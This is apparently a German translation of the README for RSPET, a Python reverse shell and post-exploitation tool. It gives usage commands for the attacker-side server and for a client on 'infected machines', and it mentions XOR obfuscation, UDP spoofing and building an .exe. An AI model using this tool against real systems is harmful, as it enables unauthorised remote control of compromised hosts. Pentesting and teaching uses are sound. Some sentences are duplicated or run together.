
RSPET (Reverse Shell and Post Exploitation Tool) ist eine Python-basierte Reverse Shell, die mit Funktionen ausgestattet ist, die in einem Post-Exploitation-Szenario unterstützen.
RSPET (Reverse Shell and Post Exploitation Tool) ist eine auf Python basierende Reverse Shell mit Funktionen, die in einem Post-Exploitation-Szenario helfen.
HAFTUNGSAUSSCHLUSS: Diese Software wird zu Bildungs- und PenTesting-Zwecken sowie als Machbarkeitsnachweis bereitgestellt. Der/die Entwickler unterstützen, provozieren oder fördern in keiner Weise unbefugten Computerzugriff und Netzwerkstörungen.
HINWEIS: Der Ordner min wurde entfernt. Der zusätzliche Aufwand für die Wartung von zwei Versionen führte dazu, dass min keine Bugfixes und wichtigen Updates mehr erhielt. Falls Interesse an der Nutzung und Wartung einer abgespeckteren Version besteht, wird ein neuer Branch erstellt, um diese zu hosten.
Aktuelle Version: v0.3.1
Folge: @TheRSPET auf Twitter für Updates.
Dokumentation : rspet.readthedocs.io
*[1]Die Idee für die XOR-Verschleierung sowie das Grundgerüst für den Client stammen von primalsecurity.net. Wenn Ihnen dieses Skriptpaket gefällt, werden Sie wahrscheinlich auch ihre Arbeit lieben.
*[2]UDP-Spoofing verwendet RAW_SOCKETS. Um es nutzen zu können, muss der Client unter einem Betriebssystem laufen, das RAW_SOCKETS unterstützt (die meisten Unix-basierten), und mit Root-Rechten. Schließlich haben die meisten ISPs Implementierungen, die gespoofte Pakete entweder verwerfen oder umstrukturieren.
*[3]Überprüfen Sie noch einmal den großartigen Blogbeitrag von primalsecurity.net zur Erstellung einer .exe.
*[4]Ausführliche Dokumentation zur Erstellung von Plugins finden Sie in der Online-Dokumentation!
rspet_server.py befindet sich auf dem Rechner des Angreifers und läuft, um Verbindungen anzunehmen.rspet_client.py befindet sich auf den infizierten Rechnern und initiiert die Verbindung und wartet auf Eingaben.Die Ausführung von ./setup.py im Stammverzeichnis des Projekts generiert die erforderlichen Zertifikate und installiert alle benötigten Komponenten über pip.
Natürlich können Sie die erforderlichen pip-Pakete auch manuell installieren, indem Sie pip2 install Flask flask-cors ausführen.
Sie können auch Ihre eigenen Schlüssel-Zertifikat-Sets erstellen (nennen Sie sie einfach server.key und server.crt und legen Sie sie im Server-Ordner ab).
python rspet_server.py [-c #clients, --ip ipToBind, -p portToBind]
max_connections standardmäßig 5, wenn leer gelassen
RESTful API:
python rspet_server_api.py [-c #clients, --ip ipToBind, -p portToBind]
Client:
python rspet_client.py <server_ip> [server_port]
Viele Änderungen können vorgenommen werden, um individuelle Bedürfnisse zu erfüllen.
Wie immer, wenn Sie Vorschläge, Fehlermeldungen oder Beschwerden haben, können Sie mich gerne kontaktieren.
Eine Liste von Distributionen, die RSPET enthalten
List_HostsDieses Projekt folgt dem Google Python Styleguide mit einer kleinen Abweichung bei der Verwendung von Leerzeichen zur Ausrichtung von ':'-Tokens.
Dieses Projekt steht Mitwirkenden offen. Wenn Sie eine neue Funktion implementiert oder eine Verbesserung am aktuellen Code vorgenommen haben, können Sie gerne einen Pull-Request eröffnen. Wenn Sie eine neue Funktion vorschlagen möchten, eröffnen Sie ein Issue. Darüber hinaus werden Tester benötigt, um einige Standardszenarien (und vielleicht auch eigene) durchzuführen, um die Wahrscheinlichkeit zu verringern, dass ein Fehler in eine neue Version gelangt. Sollte Interesse am Testen bestehen, wird ein beta-Branch erstellt (in dem zu testender Code hochgeladen wird) zusammen mit einer Liste von Szenarien. Eine vollständige Anleitung zu Mitwirkungsmöglichkeiten und Anleitungen finden Sie im Kapitel 'Contributing' in der Online-Dokumentation von RSPET.
dzervas -- Code (Server OO-Redesign, Implementierung des Server-Plugin-Systems, Fehlermeldungen, Fehlerbehebungen)
MIT
i.
.7.
.. :v
c: .x
i.::
:
..i..
#MMMMM
QM AM
9M zM
6M AM
2M 2MX#MM@1.
0M tMMMMMMMMMM;
.X#MMMM ;MMMMMMMMMMMMv
cEMMMMMMMMMU7@MMMMMMMMMMMMM@
.n@MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMM@@#$BWWB#@@#$WWWQQQWWWWB#@MM.
MM ;M.
$M EM
WMO$@@@@@@@@@@@@@@@@@@@@@@@@@@@@#OMM
#M cM
QM tM
MM CMO
.MMMM oMMMt
1MO 6MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM iMM
.M1 BM VM ,Mt
1M @M .............................. WM M6
MM .A8OQWWWWWWWWWWWWWWWWWWWWWWWWWWW0Az2 #M
MM MM.
@MMY vMME
UMMMbi i8MMMt
C@MMMMMbt;;i.......i;XQMMMMMMt
;ZMMMMMMMMMMMMMMM@A;.
Der Kuchen ist eine Lüge. Aber es ist ein Jahr her :)